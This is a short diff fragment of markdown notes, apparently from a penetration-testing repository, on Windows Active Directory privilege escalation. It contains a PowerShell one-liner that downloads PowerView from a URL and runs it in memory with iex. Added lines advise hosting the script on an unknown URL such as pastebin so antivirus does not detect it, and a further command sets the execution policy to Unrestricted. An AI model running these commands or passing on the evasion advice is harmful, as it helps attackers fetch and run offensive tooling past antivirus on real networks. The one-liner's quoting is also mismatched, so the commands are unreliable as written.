comibat/security/privilege_escalation_windows_active_directory.md

 > iex ((New-Object System.Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1"))```

-**NOTE:** if AV detects the URL, then just host it somewhere on your own **NOTE:** If execution is forbidden in powershell use this:
+**NOTE:** if AV detects the URL, then just host it somewhere on your own.</br>
+It has to be served from a unknown URL, since AV catches the PowerView, PowerShell etc. words.</br>
+One of the solutions is to use an online service like https://pastebin.com, or https://paste.ee

+**NOTE:** If execution is forbidden in powershell use this:
 ```powershell
     Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted